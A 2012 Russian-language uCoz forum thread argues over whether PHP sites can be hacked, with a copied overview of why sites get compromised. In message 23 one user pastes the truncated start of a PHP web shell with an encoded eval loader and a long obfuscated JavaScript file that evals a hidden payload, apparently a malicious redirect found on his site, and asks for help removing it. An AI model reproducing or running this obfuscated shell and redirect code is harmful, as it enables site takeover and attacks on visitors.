• Страница 2 из 2
  • «
  • 1
  • 2
Модератор форума: dotbot  
Можно ли взломать сайт через установленые пхп скрипты?
JonMagon
Сообщений: 2291
Репутация: 1828

Сообщение # 16 | 19:07:28
Quote (true3071)
PHP обеспечивает хорошую защиту,но не 100%

Как раз таки 100%
Quote (true3071)
я не пойму-вроде ты должен знать о методах взлома ,если занимаешься сайтами

Я их знаю, большинство из них - бред.
Специально для вас: сайты на uCoz взламываются через личные сообщения, как именно, говорить не буду, унесу эту тайну с собой smile

Не оказываю поддержку посредством ЛС/ICQ/Skype/AIM/XMPP/E-mail.
true3071
Сообщений: 435
Репутация: 71
Уровень замечаний:

Сообщение # 17 | 19:09:06
Quote (JonMagon)
Специально для вас: сайты на uCoz взламываются через личные сообщения, как именно, говорить не буду, унесу эту тайну с собой


да я знаю как юкоз ломать----------щяс не об этом-----сайты на пхп то же ломаются и мы здесь по моему не первооткрыватели
-----------------------------
JonMagon
Сообщений: 2291
Репутация: 1828

Сообщение # 18 | 19:09:48
Quote (true3071)
сайты на пхп то же ломаются и мы здесь по моему не первооткрыватели

Ссылки, ссылки где?

Не оказываю поддержку посредством ЛС/ICQ/Skype/AIM/XMPP/E-mail.
true3071
Сообщений: 435
Репутация: 71
Уровень замечаний:

Сообщение # 19 | 19:13:17
хотя ладно

у каждого свое направление

Добавлено (16-Апр-2012, 19:12:11)
---------------------------------------------

Quote (JonMagon)
Ссылки, ссылки где?


да какие ссылки ------ книги для этого есть

для тебя создатель Линукса вообще ничего не значит?

Добавлено (16-Апр-2012, 19:13:17)
---------------------------------------------
он систему серверную создал

на которой все ваши серваки

и вы еще говорите что ее нельзя взломать

если сам создатель говорит обратное

JonMagon
Сообщений: 2291
Репутация: 1828

Сообщение # 20 | 19:16:28
Quote (true3071)
он систему серверную создал на которой все ваши серваки и вы еще говорите что ее нельзя взломать если сам создатель говорит обратное

Причем тут сервер, у нас речь о PHP.
Вы не уходите от основной мысли...
Quote (true3071)
да какие ссылки ------ книги для этого есть

Ссылки на взломанные сайты.
Я на словах тоже президент.

Не оказываю поддержку посредством ЛС/ICQ/Skype/AIM/XMPP/E-mail.
true3071
Сообщений: 435
Репутация: 71
Уровень замечаний:

Сообщение # 21 | 19:28:14
Quote (JonMagon)
Причем тут сервер, у нас речь о PHP.


я привожу тебя к мысли что

не зависимо от того пхп не пхп ------ сайт любой можно взломать

речь идет о сайтах на пхп?
они выдают на экран уже готовый результат
но они интерактивно общаются с пользователем
а раз есть связь
значит есть возможность залезть я считаю
и пхп только усложняет эту задачу и все

Добавлено (16-Апр-2012, 19:28:14)
---------------------------------------------
это просто дабы не спорить
---------------------------------
Зачем взламывают сайты

Процесс взлома сайтов сейчас поставлен на поток. Ботнеты используют известные эксплойты к распространенным CMS, взламывают сайты, устанавливают на них свои скрипты и дальше могут использовать взломанный сайт в любых целях. Вирусы крадут пароли от FTP, подключаются к сайтам и заражают их вирусами, которые в свою очередь заражают посетителей сайтов, после чего круг повторяется. Чаще всего после взлома сайта происходит следующее:

Дефейс сайта. Это можно назвать, скорее, озорством, дальше дефейса дело часто не идет.
Заражение страниц сайта вирусом. Вирусы могут как просто добавляться в конец каждой страницы сайта, так и быть довольно изощренными. Например, нам встречался вирус, заражавший конкретный класс Joomla, отвечающий за вывод данных в браузер.
Поиск других сайтов в соседних папках и их заражение.
Рассылка спама.
Загрузка PHP Shell и выполнение произвольных действий — например, попытка взлома сервера с помощью существующих эксплойтов к операционным системам.
Установка ботов, которые подключаются к серверу IRC и могут выполнять произвольные команды «хозяина» — например, производить DDoS других сайтов.

То есть, действия взломщиков направлены на дальнейшее распространение ботов, создание сети (ботнета) и дальнейшее ее использование в своих целях.

JonMagon
Сообщений: 2291
Репутация: 1828

Сообщение # 22 | 19:31:07
Quote (true3071)
не зависимо от того пхп не пхп ------ сайт любой можно взломать

Еще раз повторяю, PHP взломать невозможно, взломали - виноват не PHP, а скрипт, который был на нем написан.
Еще раз прочитайте сообщение # 5 от G-XPert.

Не оказываю поддержку посредством ЛС/ICQ/Skype/AIM/XMPP/E-mail.
true3071
Сообщений: 435
Репутация: 71
Уровень замечаний:

Сообщение # 23 | 19:37:28
вот это пример пхп шелла
--------------------------------------
<?php #v2.3 //Version
$auth_pass = ""; //75b43eac8d215582f6bcab4532eb854e
$color = "#00FF66"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65
\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5
GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
// ... много кода в base64
------------------------------------------------

и теперь найди связь с этим файлом

щяс,,,,,,,,,,,,,

Добавлено (16-Апр-2012, 19:33:49)
---------------------------------------------

Quote (JonMagon)
Еще раз повторяю, PHP взломать невозможно, взломали - виноват не PHP, а скрипт, который был на нем написан.


суть одна

итог один

значит вопрос неправильный

взламывают не скрипты а сайты
-----------------------------------------щяс скину другой файл который меня непосредственно интересует ----------поможешь если объясниш

Добавлено (16-Апр-2012, 19:35:51)
---------------------------------------------
var $3=(Date);if($3){$Y='5726';}var $T={'k':'str\x69\x6E\x67','U':'spli\x74','z':'\x73\x75bstr','I':!false,'i':'leng\x74\x68','Z':'re\x76\x65\x72se','B':'joi\x6E'},$G='',$M=[' rvax0_8ac\\E6=8,""[\\\\6x"xx",""8"63,\\x6\\99\\,6xx6\\E"\\7x4"xxF6x7\\07\\2\\x4774x\\6x\\F\\x"x\\7907\\x5x"\\,665\\\\76x7\\x4x4C\\\\5xx66x\\56Dx6\\5\\27xE4\\x6 \\x4\\x7x44"69\\x9\\\\\\x",6C,"56\\"x7x7\\46x7\\5x\\4x5\\5\\66x6xC\\x\\6x\\D54x7\\x\\x6E4\\3x77x9\\x\\26\\4\\\\15x6x\\7x14xE6\\6xx5D\\,""6\\ xC665\\x\\\\xE6x6x\\678\\,"4x"x\\771\\6xx7\\2x\\06E\\F\\5x64x4\\7Ex6\\x\\x6"x\\4x6\\,5"6FD6\\\\xx\\E6x7\\xF656x\\7x5\\x3\\6F\\x\\x65x76\\723 "\\2xx7\\E,\\2x\\"4x77x8"",\\4x\\2C65xx\\x\\72\\9x\\572"x6\\x\\",F6\\Ex66xD\x6Fin','_xd':'s\x74\x72ing','_zM':[],'_g1':!false,'_T2':'decodeU\x52\x49\x43\x6F\x6D\x70\x6F\x6E\x65nt','_bH':'spl\x69\x74','_8S':'su\x62\x73\x74r'},_xd=function(_){for(_1=~_j. _zM-~_j._zM;_1<_P[_]/2;_1++){_a+='\x25'+_P[_j._8S](_1*2, 2);}wi\u006E\u0064ow['ev\x61\x6C'](_e[_j._T2](_a));},_P=',**;,[[-$^]-,:*[]*][**]~$|[[$<,:]*][$<,:]*],[[[<[[$<,:]*],$<,:]*]$$<,:],]}$<,:]}]$$<,:]*}]$<,:]*]$$<,:]*}}$<,:]*]$$<,:]*}$$<,:],]}$<,:]}][$<,:],].$<,:]}].$<,:]*]}[[[<[[$<,:]*]}$<,:]*].$<,:],]]$<,:],]-$<,:]*}]$<,:]*];$<,:],].[[[<[[$<,:],]]$<,:],]}$<,:],].$<,:]*}]$<,:]*]$[[[<[[$<,:]*][$<,:]*}]$<,:]*}*$<,:]*]]$<,:]*}[[[[<[[$<,:],]}$<,:]*}*$<,:],]-[[[<[[$<,:]*}]$<,:]*].$<,:]*}$$<,:]*}[$<,:],]][[[<[[$<,:]*].$<,:]*}$$<,:]*}$$<,:]*]$$<,:],][$<,:]}]:$<,:]$]}$<,:]}}}$<,:]}}][[[<[[$<,:]*}$$<,:]*}*$<,:]*]*$<,:]*}*$<,:]*}]$<,:]*}]$<,:]*}*$<,:],],[[[<[[$<,:]*].$<,:]*}$$<,:]*]}$<,:]*]$$<,:],]:$<,:]}}*$<,:]*]*[[[<[[$<,:]*}$$<,:]*}*$<,:]*].$<,:]*}$$<,:]*]}$<,:]*]$$<,:],]:[[[<[[$<,:]*};$<,:]*}*$<,:]*}*$<,:]*}}$<,:]*}]$<,:]*];$<,:][}$$<,:],]$$<,:]*]]$<,:]*}*$<,:],};$<,:][}$$<,:]*]]$<,:]*}*$<,:]*}}[[[<[[$<,:]*]$$<,:]*]]$<,:]*}*$<,:],]]$<,:]*].$<,:]*],$<,:][}$$<,:]*]]$<,:]*}*$<,:]*}}$<,:][}$$<,:],]$$<,:]*];[[[<[[$<,:]*}}$<,:]*];$<,:]*}$$<,:],]$$<,:]*]]$<,:]*}*$<,:],};$<,:][}$$<,:],][$<,:],]$[[[<[[$<,:]]];[[[<[[$<,:]*];$<,:]*];[[[<[[$<,:]*];$<,:]*][[[[<[[$<,:]*]:$<,:],][$<,:]*]$$<,:]*]*[[[<[[$<,:]*]:$<,:],]}$<,:],]}$<,:],]-$<,:]]};$<,:][}*$<,:][}*$<,:],]$$<,:]*]]$<,:][}}$<,:],]-$<,:]*}*$<,:],][$<,:],]}$<,:]*];$<,:]*}]$<,:]*}]$<,:]*]$$<,:],][$<,:][}$$<,:],][$<,:],]$$<,:][}*$<,:]*}]$<,:]*}*$<,:]*];$<,:]*]}$<,:][}*$<,:]]]}[[[<[[$<,$]-]}]}]:$<,$]-]}]]]-$<,$]-]}]]];$<,$]-]}]]}[$<,$]-]}]]}$$<,$]-]}]]}}$<,$]-]}]}}[$<,:][]-$<,$]-]}]]]}$<,$]-]}]]}[$<,$]-]}]}}*$<,:][]-$<,:],]$$<,:]*]]$<,:]*}*$<,:],};[[[<[[$<,:]*][$<,:]*];[[[<[[$<,:]*][$<,:]*][[[[<[[$<,:]*]:$<,:],]}$<,:],]}$<,:],]-$<,:]]};$<,:][}*$<,:][}*$<,:]*]}$<,:]*];$<,:]*}]$<,:]*].$<,:]*]*$<,:]*]$$<,:][}$$<,:],][$<,:],]$$<,:][}*[[[<[[$<,$]-]}]}]:$<,$]-]}]]]-$<,$]-]}]]];$<,$]-]}]]}[$<,$]-]}]]}$$<,$]-]}]]}}$<,$]-]}]}}[$<,:][]-$<,$]-]}]]]}$<,$]-]}]]}[$<,$]-]}]}}*$<,:][]-$<,:]}]}$<,:]}}]$<,:]}]$[[[<[[$<,$]-]}];}}$<,$]-]}]]]-$<,$]-]}]}]-$<,$]-]}]}]]$<,$]-]}]}]:$<,$]-]}]]]$$<,$]-]}]]}}$<,$]-]}]}}[$<,:][]-$<,$]-]}]}]]$<,$]-]}]}];$<,$]-]}]]}[$<,$]-]}]]}$$<,$]-]}]]][$<,$]-]}]]]:$<,$]-]}]}}*$<,:][]-$<,$]-]}]]]:$<,$]-]}]}];$<,$]-]}]]}*$<,$]-]}]]}$$<,$]-]}]]}[$<,$]-]}]}}]$<,$]-]}]]],$<,$]-]}]]}$$<,$]-]}]]][$<,$]-]}]]]-$<,$]-]}]]}}$<,$]-]}]]]:$<,$]-]}]}}*$<,:][}]$<,:][]-$<,$]-]}]]}*$<,$]-]}]]}$$<,:][]-$<,$]-]}]]][$<,$]-]}]}];$<,$]-]}]]]$$<,$]-]}]]}]$<,:][]-$<,$]-]}]]][$<,$]-]}]]}$$<,$]-]}]]}*$<,$]-]}]}]-$<,$]-]}]]}$$<,$]-]}]}];$<,$]-]}]]]-$<,$]-]}]]}]$<,:][]-$<,$]-]}]]}$$<,$]-]}]]];$<,$]-]}]}]-$<,$]-]}]]]-$<,$]-]}]}].$<,$]-]}]]]-$<,$]-]}]]].$<,$]-]}]}][$<,$]-]}]]]$$<,$]-]}]}];$<,$]-]}]}}]$<,:][]-$<,$]-]}]]][$<,:][]-$<,:]}].$<,:]}]]$<,:]$];$<,:]]};[[[<[[$<,:]]]]$<,:]]],$<,:]]]*$<,:]]]:$<,:]]]:$<,:]]]-$<,:]]]]$<,:]]].$<,:]]]$[[[<[[$<,:]*]:$<,:],]}$<,:],]}$<,:],]-$<,:]]};$<,:][}*$<,:][}*$<,:],]$$<,:]*]]$<,:][}}$<,:],]-$<,:]*}*$<,:],][$<,:],]}$<,:]*];$<,:]*}]$<,:]*}]$<,:]*]$$<,:],][$<,:][}$$<,:],][$<,:],]$$<,:][}*$<,:]*]*$<,:]*}*$<,:],][$<,:],]$$<,:]*}}$<,:][}*$<,:]]]*$<,:]]][$<,:][}}$<,:]]];$<,:]]]]$<,:]]]*$<,:]]];$<,:][}}$<,:]]];[[[<[[$<,:],][$<,:]*]$$<,:],]-$<,:]*}]$<,:]*];$<,:]*]]$<,:]*]$[[$~]|,**;,[[-*;*<*;,[*~]~]-]|,**;,[[-*]*^*),}*$*),}]~*}*^*],$*~*$*),}]|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]-$~[.[;]~*),$*<*<[.[.,|*}*^*],$*~*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]-$~[.$|$^]-,:*[]*][**$|]]$~$~$|$^]-,:*[]*][**$|][$~$~]~$^]-,:*[]*][**$|]}$~]|,~[-]|**,$*)*],}*.*^*)[-*;[:[.,|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]$$~[.[;]~*),$*<*<[.[*[*[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]*$~[.[;]~*),$*<*<[.[.,|,**;,[[-$^]-,:][*}][**,:]}]~*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]$$~[.$|$^]-,:*[]*][**$|],$~$~]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|]:$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];]-$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];];$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];][$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];]]$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|,~[-*$*<,]*$[-,|*;*<*;,[*~]~$^]-,:*[]*][**$|];]}$~]|,~[-]|,~[-]|**,$*)*],}*.*^*)[-*[[:[.,|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]$$~[.[;]~*),$*<*<[.[*[*[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]*$~[.[;]~*),$*<*<[.[.,|,}*$*~,-]~*}*^*],$*~*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]$$~[.$|$^]-,:*[]*][**$|];],$~$~]|*.**[:$^]-,:*[]*][**$|];]:$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,}*$*~,-]~*}*^*],$*~*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]*$~[.$|$^]-,:*[]*][**$|],$~$~]|*.**[:$^]-,:*[]*][**$|];].$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,~[-*$*<,]*$[-,|*;*<*;,[*~]~];]|,~[-]|,~[-]|**,$*)*],}*.*^*)[-*][:[.,|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][]-$~[.[;]~*),$*<*<[.[*[*[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][];$~[.[;]~*),$*<*<[.[.,|,}*$*~,-]~*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][]-$~[.$|$^]-,:*[]*][**$|];],$~$~]|*.**[:$^]-,:*[]*][**$|][][$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,}*$*~,-]~*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][];$~[.$|$^]-,:*[]*][**$|],$~$~]|*.**[:$^]-,:*[]*][**$|][]]$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,~[-*$*<,]*$[-,|*;*<*;,[*~]~];]|,~[-]|,~[-]|*;[:[.]|*.**[:*;*<*;,[*~]~]~]-[.,|*[[:[.]|,~[-]|*.**[:*;*<*;,[*~]~]~]-[.,|*][:[.]|,~[-]|*.**[:*;*<*;,[*~]~]~];[.,|,-,[*^*~,-,}[:$^]-,:*[]*][**$|][]}$~[<$^]-,:*[]*][**$|][]$$~[.]|,~[-]|*.**[:*;*<*;,[*~]~]~];[.,|*<*^*]*;,}*.*^*)$|$^]-,:*[]*][**$|][],$~$~[:$^]-,:*[]*][**$|][]*$~[.]|,~[-]|',_q=function(){_q=_a[_j._Nk]('\x2D')[_j._bH]('\x25');for(var _2 in _q){if(typeof(_q[_2])==_j._xd){_P=_P[_j._bH](_q[_2][_j._8S](1))[_j._Nk](_q[_2][_j._8S](0,1));}}return this;},_e=_q(),_a='';_xd('len\x67\x74\x68');
-------------------------------------------------
разбери его

нужно убрать редирект

Добавлено (16-Апр-2012, 19:37:28)
---------------------------------------------
ссылка uvaforum.ucoz.ru/run.js

JonMagon
Сообщений: 2291
Репутация: 1828

Сообщение # 24 | 19:38:25
true3071, не собираюсь я его разбирать.
Ну давайте, покажите его супермощность...

Не оказываю поддержку посредством ЛС/ICQ/Skype/AIM/XMPP/E-mail.
true3071
Сообщений: 435
Репутация: 71
Уровень замечаний:

Сообщение # 25 | 19:42:24
не понял

Добавлено (16-Апр-2012, 19:42:24)
---------------------------------------------
мне его нужно разобрать

мне нужен этот шаблон

а файл управления явно с намеком

хоть и поставил фикс но есть и другие

JonMagon
Сообщений: 2291
Репутация: 1828

Сообщение # 26 | 21:07:41
Quote (G-XPert)
В целом я хочу сказать, что абсолютно безопасных решений нет, и уровень безопасности зачастую зависит от внимательности и уровня профессионализма программиста. PHP писали тоже программисты, поэтому вероятность того, что где-то есть какая-то уязвимость есть, но она очень мала, т. к. писали его профессионалы.

Собственно то, что я и пытаюсь доказать.
Меня не слушают, возможно, хоть вас послушают.

Не оказываю поддержку посредством ЛС/ICQ/Skype/AIM/XMPP/E-mail.
true3071
Сообщений: 435
Репутация: 71
Уровень замечаний:

Сообщение # 27 | 21:10:29
Quote (G-XPert)
G-XPert


я рад что есть все же люди разбирающиеся в вопросе с которым работают
+1

Добавлено (16-Апр-2012, 21:10:29)
---------------------------------------------

Quote (JonMagon)
Собственно то, что я и пытаюсь доказать.


как раз ты речь вообще вел не зная о чем
  • Страница 2 из 2
  • «
  • 1
  • 2
Поиск:
Telegram
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!